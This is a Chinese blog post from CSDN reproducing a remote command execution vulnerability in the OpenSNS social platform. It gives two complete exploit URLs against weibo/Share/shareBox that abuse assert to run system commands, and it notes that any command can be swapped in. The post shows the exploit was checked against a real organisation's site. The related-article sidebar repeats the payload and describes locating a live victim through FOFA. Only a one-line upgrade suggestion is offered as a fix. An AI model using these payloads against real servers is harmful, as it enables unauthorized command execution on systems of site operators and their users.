opensns综合性社交软件系统存在远程命令执行高危漏洞

已于 2023-08-01 11:29:33 修改
阅读量3.4k 收藏 2
点赞数 1
分类专栏: 漏洞复现 文章标签: 网络 安全
于 2023-08-01 11:27:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68647219/article/details/132038394
版权
本文报道了opensns社交软件系统中的高危远程命令执行漏洞,源于weibo/share/sharebox的get请求参数处理不当,可被攻击者利用执行任意命令。文章提供了漏洞复现方法和利用PoC,并建议用户通过官方升级包进行修复。
摘要由CSDN通过智能技术生成

漏洞说明:

opensns综合性社交软件系统远程命令执行高危漏洞,该漏洞是由于漏洞入口在 weibo/share/sharebox通过 get请求提交query参数存在变量覆盖,可能导致攻击者通过漏洞发送特定的请求包执行任意命令。

漏洞复现:

1.资产归属证明

通过鹰图平台发现xx.xx.com归属于xxx有限公司,如同所示:

2. 利用poc

/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule->_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ipconfig)

 可以执行cmd命令ipconfig,或修改括号里任意命令如:dir、phpinfo()、netstat等。证明漏洞存在,如下图所示:

/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule->_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(phpinfo())

 3.修复建议

根据官方升级包,进行升级。

朝阳挽歌
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
漏洞复现 || OpenSNS远程命令执行漏洞
失心少年
07-12 678
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!opensns是基于tp3开发的,仅支持php5,漏洞入口在 weibo/share/sharebox,通过 get请求提交query参数,存在变量覆盖的漏洞,攻击者通过漏洞发送特定的请求包可以执行任意命令。1.执行如下POC可执行远程命令
OpenSNS开源社交系统 v5.7.0
10-14
OpenSNS一款有身份的开源SNS社交系统,包含 微博、资讯、活动、论坛、专辑、积分商城、群组、充值中心、 问答、分类信息、微店等模块,支持PC端、手机网页版、客户端、 微信版
OpenSNS开源社交系统--文件上传渗透测试复现
CNXBDSa的博客
08-19 1612
前提:在先知社区里面偶然看见了这个漏洞,咱也想试试,就下载了开源的码进行了本地的复现 源码信息:OpenSNS开源版 漏洞类型:后台getshell 下载地址:http://www.opensns.cn/home/index/download.html 漏洞文件:./Application/Admin/Controller/ThemeController.class.php 第170行 可参考这下载安装使用https://www.w3cschool.cn/opensnscourse/laxp1pnw.htm
OpenSNS后台文件上传漏铜分析
weixin_30369087的博客
07-06 303
前言   这几天正在想找个文件上传漏洞分析一波,以加深对文件上传漏洞的理解,正好看到FreeBuf的一片文章记对OpenSNS的一次代码审计,由于其只对漏洞进行复现,故在此进行代码层面的分析。 漏洞分析   已知漏洞产生点:./Application/Admin/Controller/ThemeController.class.php 第170行      跟入upload函数(...
Opensns 命令执行漏洞(CNVD-2021-34590)
小小猪的博客
12-29 3583
Opensns 命令执行漏洞(CNVD-2021-34590) 漏洞描述: OpenSNS 存在远程命令执行漏洞,攻击者通过漏洞发送特定的请求包可以执行任意命令 影响版本: OpenSNS v5 环境搭建: 在线环境 地址 访问首页 构造poc /index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[m.
OpenSNS 远程执行任意命令漏洞
最新发布
未花的博客
12-01 359
status必须等于1,值里必须要app、model、method
opensns 命令执行 (CNVD-2021-34590)漏洞复现
weixin_42675091的博客
09-23 1345
opensns 命令执行 (CNVD-2021-34590)漏洞复现
一次渗透测试......OpenSNS漏洞
giaogiao123的博客
08-09 1440
fofa上直接找,找到某倒霉的站。 直接搜索OpenSNSv 6.2 首先开始试一试前台rce index.php?s=weibo/share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[method]=-%3E_validationFieldItem%26id[status]=1%26id[4]=function%26id[1]=assert%26id[args]=jiang=phpinfo()%26id
OpenSNS开源社交系统 v5.1.0
11-29
OpenSNS开源社交系统是一款专为构建具有身份特色的社交网络平台设计的软件系统。它集成了多种社交功能,包括微博、资讯、活动、论坛、专辑、积分商城、群组、充值中心、问答、分类信息以及微店等模块,旨在提供全...
OpenSNS开源社交系统 v2.8.1
12-06
OpenSNS一款有身份的开源SNS社交系统,包含 微博、资讯、活动、论坛、专辑、积分商城、群组、充值中心、 问答、分类信息、微店等模块,支持PC端、手机网页版、客户端、 微信版等多种平台,可以为客户快速搭建社交...
OpenSNS开源社交系统
09-17
OpenSNS一款有“身份”的开源免费SNS社交系统,包含 微博、资讯、活动、论坛、专辑、积分商城、群组、充值中心、 问答、分类信息、微店等模块,支持PC端、手机网页版、客户端、 微信版等多种平台,可以为客户快速搭建社交网站。2015年1月28日ThinkOX 正式更名为 OpenSNSOpenSNS v3.0 更新的具体内容: 【修改】后台采用基于Bootstrap 3.x的高级管理控制面板主题:AdminLTE,AdminLTE - 是一个完全响应式管理模板。基于Bootstrap3框架,界面简洁清爽,易于使用。 【增加】行为日志新增筛选和导出功能,可以根据行为和日期筛选自己想要的数据、导出功能也便于对数据进行处理和备份。 【增加】新增排行榜,分别是粉丝排行,积分排行,连签排行和累签排行。 【增加】新增签到日历,清晰跟踪记录自己的“足迹” 【增加】后台新增统计模块,包括网站统计,活跃用户统计,留存率统计,流失率统计和充值用户统计。 【增加】用户组新增有效期。有效期为选填项,选择后用户组将在到期后自动关闭。便于网站开展临时或短期活动时使用。 【调整】邀请机制优化,告别繁琐的操作,注册后用户即可获得专属自己的链接。 【调整】公告系统优化,新版公告系统解决了无法与主题很好兼容的问题,可选择是否强制推送,强制推送的公告将以弹窗的形式推送给用户,而没有选择强制推送的公告将以系统消息的形式推送给用户,可查看有多少人,哪些人查看了公告。 【调整】签到插件优化,现在签到可以绑定多事件 【调整】前台UI进行了大的调整,修改了配色和主题、登录注册和微博 【调整】消息系统全面升级,以会话的形式对消息进行分类,支持模板消息 【调整】优化身份创建,新增身份创建向导 【新增】新增全站搜素 【新增】管理员现在可以修改编辑网站用户的部分资料
OpenSNS-a5
11-08
opensns源码,下载安装即可使用,可以在在代码里面编辑一系列内容
OpenSNS微社区 6.0.0.zip
05-27
OpenSNS微社区是一款综合性社交软件,您可以使用OpenSNS快速搭建一个类似新浪微博一样的功能强大的社交网站,您的社交网站也可以在微信中被访问,还支持苹果和安卓手机通过APP的形式使用,除此之外,OpenSNS还提供云市场进行功能扩展,大量的扩展让你的网站如虎添翼。OpenSNS微社区 6.0.0 更新日志:2018-09-11[修复]原生支付配置;[修复]伪静态下,论坛帖子翻页功能;[修复]论坛用户权限限制功能;[优化]聚合首页活动栏的介绍显示字数。
OpenSNS开源社交系统 v3.0
12-05
OpenSNS一款有身份的开源SNS社交系统,包含 微博、资讯、活动、论坛、专辑、积分商城、群组、充值中心、 问答、分类信息、微店等模块,支持PC端、手机网页版、客户端、 微信版等多种平台,可以为客户快速搭建社交...
OpenSNS开源社交系统 v6.2.0
08-18
OpenSNS开源社交系统 v6.2.0是一款专为构建社交网络平台设计的软件解决方案。这个系统的特点在于它提供了一整套丰富的功能模块,旨在帮助用户创建具有身份验证的多用途社交网络。以下是关于OpenSNS v6.2.0的一些详细...
opensns v6.2.0前台RCE漏洞分析
weixin_40484719的博客
10-16 2958
最近准备进一步学习下代码审计,因此打算找些历史漏洞分析学习下。(啥时候我也能挖出前台rce呢 本次漏洞的入口点在于 Application/Weibo/Controller/ShareController.class.php的shareBox方法。 Application/Weibo/Controller/ShareController.class.php share控制器获取外部输入$query,并将它用parse_str解析后交给$array,这里其实就相当于传入了一个数组。接下...
openSNS(V2版本) 用户身份切换可能产生的bug以及正规流程
F_shan的博客
07-29 944
openSNS V2版本注册用户的身份切换有一个严格的流程,不是通过这个流程切换用户身份会造成登入和提示身份未审核或禁用提示,影响体验。在此我会给出身份切换的流程:
opensns功能详解
weixin_30765475的博客
06-07 178
opensns功能详解 opensns功能详解 软件工程 轮播功能 此项可以用来发布广告、新闻等。对于实验室网站而言,可以用来放实验室最新的招生信息等内容。在后端,我们可以设置图片的开始生效时间、失效时间,同时也可以看到点击量等信息。 网站前端示意图如下: 网站后端操作如下: 发布动态功能 此项类似于QQ空间说说、新浪微博。用户可...
opensns建站
weixin_30737363的博客
07-27 144
opensns建站 标签(空格分隔):软件工程 贪玩蓝月 购买云服务器 首选阿里云,一个月9.9元,还能直接安全宝塔Linux界面 后台初始化 输入ip地址:8888访问宝塔后台,第一次进入后台会让你选择环境,我们选择lamp环境,点击一键安装,就可以自动安装了。 快速建站 按照下图所示进行网站的创建,php版本和ftp可以按照自己需要选择 上传源码 直接上传zip格式压缩文件,解压...
OpenSNS与畅言第三方评论整合教程
在IT行业中,尤其是社交媒体平台或内容管理系统开发中,集成第三方评论系统是一个常见的需求,以提升用户体验并增强互动性。畅言是一款流行的评论插件,它能够方便地与各种网站进行集成。本教程详细阐述了如何在...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

朝阳挽歌

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值